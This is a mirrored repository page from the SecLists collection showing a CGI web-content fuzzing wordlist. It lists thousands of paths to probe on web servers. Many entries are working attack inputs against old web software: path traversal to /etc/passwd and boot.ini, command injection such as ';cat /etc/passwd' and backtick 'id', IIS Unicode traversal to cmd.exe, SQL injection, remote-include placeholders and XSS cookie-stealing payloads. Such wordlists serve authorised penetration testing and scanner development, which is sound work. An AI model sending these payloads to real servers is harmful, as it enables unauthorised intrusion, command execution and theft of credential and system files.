danielmiessler/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists.git synced 2024-08-17 06:40:45 +03:00
Code Issues Projects Releases Wiki Activity
master
SecLists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt
Karim Kanso 607c3293b4 strip trailing whitespace
2020-05-27 14:26:51 +01:00

3949 lines
137 KiB
Plaintext
Raw Permalink Blame History

# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
852566C90012664F
</etc/passwd>
<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.aspx
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.stm
<script>alert('Vulnerable')</script>.thtml
?D=A
?M=A
?N=D
?Open
?OpenServer
?PageServices
?S=A
?\"><script>alert('Vulnerable');</script>
?mod=<script>alert(document.cookie)</script>&op=browse
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
?pattern=/etc/*&sort=name
?sql_debug=1
?wp-cs-dump
ADMINconfig.php
ASP/cart/database/metacart.mdb
AT-admin.cgi
AT-generate.cgi
Admin/
Admin_files/
Admin_files/order.log
Administration/
Agent/
Agentes/
Agents/
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Asp/
BACLIENT
Backup/add-passwd.cgi
C
CFIDE/administrator/index.cfm
CFIDE/probe.cfm
COM
CSMailto.cgi
CSMailto/CSMailto.cgi
CSNews.cgi
CVS/Entries
Cgitest.exe
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Config1.htm
Count.cgi
DB4Web/10.10.10.10:100
DC
DCFORM
DCFORMS98.CGI
DCShop/auth_data/auth_user_file.txt
DCShop/orders/orders.txt
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEESAdmin.nsf
DMR/
Data/settings.xml+
DomainFiles/*//../../../../../../../../../../etc/passwd
EXE/
Excel/
File
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?<script>alert(\
FormMail.pl
GW5/GWWEB.EXE
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?HELP=bad-request
Gozila.cgi
HyperStat/stat_what.log
IBMWebAS/
IBMWebAS/apidocs/
IBMWebAS/configDocs/
IBMWebAS/docs/
IBMWebAS/mbeanDocs/
IDSWebApp/IDSjsp/Login.jsp
ISSamples/SQLQHit.asp
ISSamples/sqlqhit.asp
IlohaMail/blank.html
ImageFolio/admin/admin.cgi
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(5).csp
JUNK(5).htw
JUNK(5).xml
JUNK(5)/
JUNK(6).cfm?mode=debug
LOGIN.PWD
LWGate
LWGate.cgi
LiveHelp/
MIDICART/midicart.mdb
MSword/
MWS/HandleSearch.html?searchTarget=test&B1=Submit
Mem/dynaform/FileExplorer.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
MsmMask.exe
MsmMask.exe?mask=/junk334
Msword/
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
NULL.printer
NetDetector/middle_help_intro.htm
NetDynamic/
NetDynamics/
OA_HTML/
OA_HTML/META-INF/
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/mwa_readme.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/_pages/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/por/services/login.jsp
OA_HTML/jsp/wf/WFReassign.jsp
OA_HTML/oam/
OA_HTML/oam/weboam.log
OA_HTML/webtools/doc/index.html
OA_JAVA/
OA_JAVA/Oracle/
OA_JAVA/oracle/forms/registry/Registry.dat
OA_JAVA/servlet.zip
OA_MEDIA/
OpenFile.aspx?file=../../../../../../../../../../boot.ini
OpenTopic
Orders/order_log.dat
Orders/order_log_v12.dat
PDG_Cart/
PDG_Cart/oder.log
PDG_Cart/shopper.conf
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
POSTNUKEMy_eGallery/public/displayCategory.php
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
Pages/
Pbcgi.exe
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
Program%20Files/
README
README.TXT
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
SGB_DIR/superguestconfig
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
SQLQHit.asp
SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
Search
SetSecurity.shm
SilverStream
SilverStream/Meta/Tables/?access-mode=text
Site/biztalkhttpreceive.dll
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteScope/htdocs/SiteScope.html
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
SiteServer/Publishing/ViewCode.asp
SiteServer/admin/
SiteServer/admin/findvserver.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
Sources/
Statistics/
Stats/
StoreDB/
Survey/Survey.Htm
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
USER/CONFIG.AP
Upload.pl
VBZooM/add-subject.php
Vs
VsSetCookie.exe?
W
WEB-INF./web.xml
WEB-INF/web.xml
WEBAGENT/CQMGSERV/CF-SINFO.TPF
WINDMAIL.EXE?%20-n%20c:\boot.ini%
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
WS_FTP.LOG
WS_FTP.ini
WebAdmin.dll?View=Logon
WebCacheDemo.html
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
WebSphereSamples
WebTrend/
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
Web_store/
Webnews.exe
XMBforum/buddy.php
XMBforum/member.php
XSQLConfig.xml
Xcelerate/LoginPage.html
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
[SecCheck]/..%252f..%252f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%2f../ext.ini
\"><img%20src=\"javascript:alert(document.domain)\">
_cti_pvt/
_head.php
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
_mem_bin/
_mem_bin/FormsLogin.asp
_mem_bin/auoconfig.asp
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
_pages
_pages/_demo/
_pages/_demo/_sql/
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_jsp/
_private/
_private/_vti_cnf/
_private/form_results.htm
_private/form_results.html
_private/form_results.txt
_private/orders.htm
_private/orders.txt
_private/register.htm
_private/register.txt
_private/registrations.htm
_private/registrations.txt
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/CGImail.exe
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_cnf/
_vti_bin/admin.pl
_vti_bin/cfgwiz.exe
_vti_bin/contents.htm
_vti_bin/fpadmin.htm
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
_vti_bin/fpremadm.exe
_vti_bin/fpsrvadm.exe
_vti_bin/shtml.dll/_vti_rpc
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_cnf/_vti_cnf/
_vti_inf.html
_vti_log/_vti_cnf/
_vti_pvt/access.cnf
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/linkinfo.cnf
_vti_pvt/service.cnf
_vti_pvt/service.pwd
_vti_pvt/services.cnf
_vti_pvt/services.org
_vti_pvt/svacl.cnf
_vti_pvt/users.pwd
_vti_pvt/writeto.cnf
_vti_txt/
_vti_txt/_vti_cnf/
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a1disp3.cgi?../../../../../../../../../../etc
a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
a1stats/a1disp3.cgi?../../../../../../../../../../passwd
a1stats/a1disp3.cgi?../../../../../../../etc/passwd
a1stats/a1disp4.cgi?../../../../../../../etc/passwd
a?<script>alert('Vulnerable')</script>
a_domlog.nsf
a_security.htm
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/\@AdminViewError
abonnement.asp
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
acartpath/signin.asp?|-|0|404_Object_Not_Found
acceso/
access-log
access.log
access/
access_log
acciones/
account.nsf
account/
accounting/
accounts.nsf
accounts/getuserdesc.asp
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
active.log
activex/
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
add_acl
add_ftp.cgi
add_user.php
addbanner.cgi
addressbook.php?\"><script>alert(Vulnerable)</script><!--
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
adduser.cgi
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
adm/
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admentor/adminadmin.asp
admin-serv/config/admpw
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
admin.cgi
admin.cgi?list=../../../../../../../../../../etc
admin.cgi?list=../../../../../../../../../../etc/passwd
admin.htm
admin.html
admin.nsf
admin.php
admin.php3
admin.php4?reg_login=1
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.pl
admin.shtml
admin/
admin/admin.php?adminpy=1
admin/admin.shtml
admin/admin_phpinfo.php4
admin/adminproc.asp
admin/aindex.htm
admin/auth.php
admin/browse.asp?FilePath=c:\&Opt=2&level=0
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin/cms/htmltags.php
admin/contextAdmin/contextAdmin.html
admin/cplogfile.log
admin/credit_card_info.php
admin/database/wwForum.mdb
admin/datasource.asp
admin/db.php
admin/db.php?dump_sql=1
admin/exec.php3
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
admin/index.php
admin/login.php?action=insert&username=test&password=test
admin/login.php?path=\"></form><form
admin/modules/cache.php+
admin/objects.inc.php4
admin/phpinfo.php
admin/script.php
admin/settings.inc.php+
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/system_footer.php
admin/templates/header.php
admin/upload.php
admin/wg_user-info.ml
admin4.nsf
admin5.nsf
admin_t/include/aff_liste_langue.php
adminhot.cgi
administration/
administrator/
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
adminwww.cgi
admisapi/fpadmin.htm
adovbs.inc
adsamples/config/site.csc
adv/gm001-mc/
advwebadmin/
advworks/equipment/catalog_type.asp
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
aff_news.php
affich.php?image=<script>alert(document.cookie)</script>
agentadmin.php
agentes/
agentrunner.nsf
aglimpse
aglimpse.cgi
akopia/
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alog.nsf
amadmin.pl
ammerum/
anacondaclip.pl?template=../../../../../../../../../../etc
anacondaclip.pl?template=../../../../../../../../../../etc/passwd
analog/
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
anthill/login.php
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
anyboard.cgi
apache/
apex/
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
aplogon.html
app/
appdet.html
applicattion/
applicattions/
applist.asp
approval/ts_app.htm
apps/
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
archie
architext_query.cgi
architext_query.pl
archivar/
archive.asp
archive/
archive/a_domlog.nsf
archive/l_domlog.nsf
archive_forum.asp
archives/
archivo/
ariadne/
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?article=4965&post=1111111111
article.php?sid=\"><Img
ash
ashnews.php
asp/
asp/SQLQHit.asp
asp/sqlqhit.asp
astrocam.cgi
atc/
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
athenareg.php?pass=%20;cat%20/etc/passwd
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
auction/auction.cgi?action=
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
auctiondeluxe/auction.pl
auktion.cgi?menue=../../../../../../../../../../etc
auktion.cgi?menue=../../../../../../../../../../etc/passwd
auth.inc.php
auth/
auth_data/auth_user_file.txt
author.asp
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autologon.html?10514
awebvisit.stat
awl/auctionweaver.pl
awstats.pl
awstats/awstats.pl
ax-admin.cgi
ax.cgi
axis-cgi/buffer/command.cgi
axs.cgi
ayuda/
b2-include/b2edit.showposts.php
b2-tools/gm-2-b2.php
ba4.nsf
backdoor/
backup/
badmin.cgi
bak/
ban.bak
ban.dat
ban.log
banca/
banco/
bandwidth/index.cgi
bank/
banmat.pwd
banner.cgi
bannereditor.cgi
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
bash
basilix.php3
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
basilix/
basilix/compose-attach.php3
basilix/mbox-list.php3
basilix/message-read.php3
bb-ack.sh
bb-dnbd/faxsurvey
bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
bb-hist?HI
bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
bb-histlog.sh
bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
bb-rep.sh
bb-replog.sh
bb000001.pl<script>alert('Vulnerable')</script>
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
bbs_forum.cgi
bbv/
bc4j.html
bdata/
bdatos/
beta/
betsie/parserl.pl/<script>alert('Vulnerable')</script>;
betsie/parserl.pl/<script>alert('XSS')</script>;
bigconf.cgi
bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
bigsam_guestbook.php?displayBegin=9999...9999
billing.nsf
billing/billing.apw
bin/
bin/CGImail.exe
bin/admin.pl
bin/cfgwiz.exe
bin/common/user_update_passwd.pl
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
bizdb1-search.cgi
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
blah-whatever-badfile.jsp
blah-whatever.jsp
blah123.php
blah_badfile.shtml
blahb.ida
blahb.idq
blog/
blog/mt-check.cgi
blog/mt-load.cgi
blog/mt.cfg
bmp/
bmp/JSPClient.java
bmp/README.txt
bmp/global-web-application.xml
bmp/mime.types
bmp/setconn.jsp
bmp/sqljdemo.jsp
bnbform
bnbform.cgi
board/index.php
board/philboard_admin.asp+
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
bookmark.nsf
books.nsf
boot/
boozt/admin/index.cgi?section=5&input=1
bottom.html
bsguest.cgi?email=x;ls
bslist.cgi?email=x;ls
buddies.blt
buddy.blt
buddylist.blt
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugtest+/+
build.cgi
bulk/bulk.cgi
busytime.nsf
buy/
buynow/
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
c/
c/winnt/system32/cmd.exe?/c+dir+/OG
c32web.exe/ChangeAdminPassword
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
c_download.cgi
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
cache-stats/
cached_feed.cgi
cachemgr.cgi
caja/
cal_make.pl?p0=../../../../../../../../../../etc
cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
calendar
calendar.nsf
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendar.pl
calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
calendar/index.cgi
calendar_admin.pl?config=|cat%20/etc/passwd|
calender_admin.pl
campas?%0acat%0a/etc/passwd%0a
carbo.dll
card/
cards/
cart.pl
cart.pl?db='
cart/
cart32.exe
cartcart.cgi
cartmanager.cgi
cash/
catalog.nsf
catalog/includes/include_once.php
categorie.php3?cid=june
catinfo
catinfo?<u><b>TESTING
caupo/admin/admin_workspace.php
cbmc/forums.cgi
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
ccard/
ccbill-local.cgi?cmd=MENU
ccbill-local.pl?cmd=MENU
ccbill/secure/ccbill.log
ccbill/whereami.cgi
cd-cgi/sscd_suncourier.pl
cd/
cdrom/
cehttp/property/
cehttp/trace
cersvr.nsf
cert/
certa.nsf
certificado/
certificate
certificates
certlog.nsf
certsrv.nsf
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
cfcache.map
cfdocs.map
cfdocs/cfcache.map
cfdocs/cfmlsyntaxcheck.cfm
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
cfdocs/expeval/openfile.cfm
cfdocs/expeval/sendmail.cfm
cfdocs/snippets/evaluate.cfm
cfdocs/snippets/fileexists.cfm
cfdocs/snippets/gettempdirectory.cfm
cfdocs/snippets/viewexample.cfm
cfgwiz.exe
cfide/Administrator/startstop.html
cfide/administrator/index.cfm
cgforum.cgi
cgi-bin-sdb/printenv
cgi-bin/
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
cgi-bin/%2e%2e/abyss.conf
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/.access
cgi-bin/.cobalt
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
cgi-bin/.fhp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.nsconfig
cgi-bin/.passwd
cgi-bin/.www_acl
cgi-bin/.wwwacl
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/Backup/add-passwd.cgi
cgi-bin/CGImail.exe
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/Cgitest.exe
cgi-bin/Count.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
